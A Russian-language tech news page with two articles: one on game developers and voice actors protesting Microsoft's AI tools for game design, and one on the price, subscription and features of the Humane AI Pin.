Компания Microsoft плотно занялась разработкой новых инструментов искусственного интеллекта. Однако профессионалы игровой индустрии бьют тревогу: неконтролируемое внедрение искусственного интеллекта (ИИ) в игры для Xbox и ПК может привести к серьёзным потерям рабочих мест среди сценаристов, дизайнеров и людей других творческих профессий, занятых в индустрии. ![]() Технологические гиганты продолжают настаивать на разработке и внедрении ИИ, в то время как специалисты, которые по задумке должны будут использовать подобные инструменты, всё чаще высказывают опасения по поводу возможного сокращения рабочих мест в игровой индустрии. Некачественный контент как результат применения инструментов ИИ, также вызывает большую озабоченность у игроделов. Согласно заявлению Microsoft, разработчикам видеоигр будет предложено использовать пакет программного обеспечения, состоящий из двух компонентов: интеллектуальный «помощник по дизайну» и ИИ-движок генерации персонажей, которые помогут разработчикам создавать сюжетные линии, квесты и другие игровые элементы. С момента публикации The Game Awards (TGA) этой новости, в X появилось великое множество комментариев от разгневанных разработчиков игр, актёров озвучки, сценаристов игр и телевизионных сценаристов. В сообщениях комментаторы критиковали и осуждали применение инструментов ИИ в индустрии. Отмечается, что внедрение «инноваций» способствовало тому, что только в этом году работу потеряли более 6-ти тысяч специалистов игровой сферы. В то время, как Microsoft продвигает инструменты ИИ, как способ для разработчиков «существенно расширить свои собственные возможности», волна негатива в отрасли наводит на мысль, что нововведение заставило актёров и сценаристов почувствовать что угодно, но только не счастье от появления ИИ в их творческой среде. При этом компании, занимающиеся созданием видеоигр, всё с большим восторгом воспринимают подобные новости, вероятно, думая: «Наконец-то у нас появилась технология, позволяющая увольнять наших работников ещё быстрее, чем раньше!» «Ненавижу всё это, — гневается Мэри Кенни (Mary Kenney), заместитель нарративного директора компании Insomniac Games, разработчика игры Wolverine для PS5 по вселенной Marvel. — TGA, вам должно быть стыдно за то, что вы таким образом обесцениваете работу художников». ![]() «Применение искусственного интеллекта вместо труда сотрудников, вкладывающих своё время и творческий потенциал в создание игр, которые мы любим, — это ужасно подло и глупо, — пишет Эрика Ишии (Erika Ishii), актриса озвучки игр Apex Legends и Destiny 2. — Корпорации получают рекордные прибыли, а мы – тысячи увольнений в год, но я всё же искренне надеюсь на поддержку нашего движения коллегами и фанатами». «Прошу вас, не отнимайте рабочие места у актёров, сценаристов и людей!» — написала в ответ на эту новость актриса «Сверхъестественного» Фелиция Дэй (Felicia Day). «Какой глупый подход со стороны Microsoft! Полагаю, что любая гейм-дев студия должна понимать, что именно люди взаимодействуют с другими людьми, которые делают свою творческую работу. А конкуренты в игровой сфере, которые считают, что искусственный интеллект будет «достаточно хорош», по моему прогнозу, не выживут. Это глупый меркантильный подход, безвкусный с художественной точки зрения», — написал актёр Бэн Прендергаст (Ben Prendergast). Бритни Моррис (Brittney Morris), сотрудница Insomniac Games, также сомневается в позиционировании инструментов ИИ со стороны Microsoft как чего-то действительно нужного для сценаристов: «Представим, что вы называете ИИ «мощным инструментом для разработчиков игр» в то время, как он буквально существует, чтобы заместить этих разработчиков. Мы не поддадимся на эти провокации». Крупные технологические корпорации делают ставку на шумиху вокруг искусственного интеллекта, поскольку финансирование в этом секторе стремительно растёт. Вместе с тем им придётся принять во внимание недовольство профсоюзов художников и сценаристов, которые стремятся защитить своё ремесло. Заменитель смартфонов Humane AI Pin будет стоить $699, но потребует подписку за $24 в месяц
09.11.2023 [11:53],
Павел Котов
Основанный выходцами из Apple стартап Humane в течение последнего года по крупицам делился информацией о нестандартном гаджете AI Pin, которое, уверен разработчик, произведёт революцию в мире мобильных устройств и даже вытеснит смартфоны. Некоторые подробности о проекте буквально накануне официального анонса удалось раздобыть журналистам The Verge. ![]() Источник изображения: Humane Лишённый экрана носимый заменитель смартфона Humane AI Pin поступит в продажу по цене $699 с подпиской за $24 в месяц — он будет подключаться к собственному мобильному оператору на основе сети T-Mobile для доступа к моделям искусственного интеллекта от OpenAI и Microsoft. Pin представляет собой квадратное устройство, которое при помощи магнитного фиксатора крепится на одежду или другую поверхность. Магнитная конструкция — это не просто фиксатор, но и блок аккумулятора, который можно заменять в течение дня, если необходимо увеличить время автономной работы устройства. Ёмкость аккумулятора не уточняется, но известно, что в комплекте с Pin идут два «усилителя батареи». Humane AI Pin оснащён процессором Qualcomm Snapdragon; на борту имеются камера, датчики глубины и движения, а также «персональный динамик», вместо которого можно пользоваться Bluetooth-наушниками. Устройство задумывалось как голосовое, но, судя по прежним демонстрациям, оно располагает лазерным проектором, который подаёт изображение на руку пользователя. Можно показывать некоторые предметы на камеру, а на корпусе есть сенсорная панель. Камера и микрофон не всегда находятся в режиме записи — он сопровождается подсвеченным «индикатором доверия» (Trust Light). Производитель подчёркивает, что Pin является полностью автономным устройством, а не аксессуаром для смартфона. Подписка за $24 в месяц включает в себя контракт с мобильным оператором, облачное хранилище для фото и видео, а также неограниченное количество запросов к ИИ-моделям. Устройство работает под управлением операционной системы под названием Cosmos — это не модульный набор приложений, а единая среда, в которой могут вызываться различные ИИ и другие инструменты по мере необходимости. Она скорее напоминает систему плагинов для ChatGPT, с помощью которой можно добавлять чат-боту новые функции или массивы данных. Есть версия, что основу Pin составляет нейросеть GPT-4. Всё это даёт устройству широкий набор возможностей, который разработчик несколько раз демонстрировал за последний год. Pin составляет сводку корреспонденции из электронной почты и пишет ответы, выступает в качестве переводчика и распознаёт продукты питания, давая даже справку об их пищевой ценности. Поддерживается музыкальная потоковая служба Tidal с «ИИ-диджеем», который подбирает музыку по контексту. Есть также связанные с ИИ функции фотографии, но пока нет ясности, что это значит. Первоначальная настройка Pin производится при помощи инструмента Humane.center, но непонятна и его сущность: это может быть личный кабинет на сайте производителя или мобильное приложение. Но можно утверждать, что этот инструмент открывает доступ к заметкам, видео и фотографиям, которые пользователь создаёт, нося устройство на себе. Официальный анонс Humane AI Pin ожидается уже сегодня. |
✴ Входит в перечень общественных объединений и религиозных организаций, в отношении которых судом принято вступившее в законную силу решение о ликвидации или запрете деятельности по основаниям, предусмотренным Федеральным законом от 25.07.2002 № 114-ФЗ «О противодействии экстремистской деятельности»; |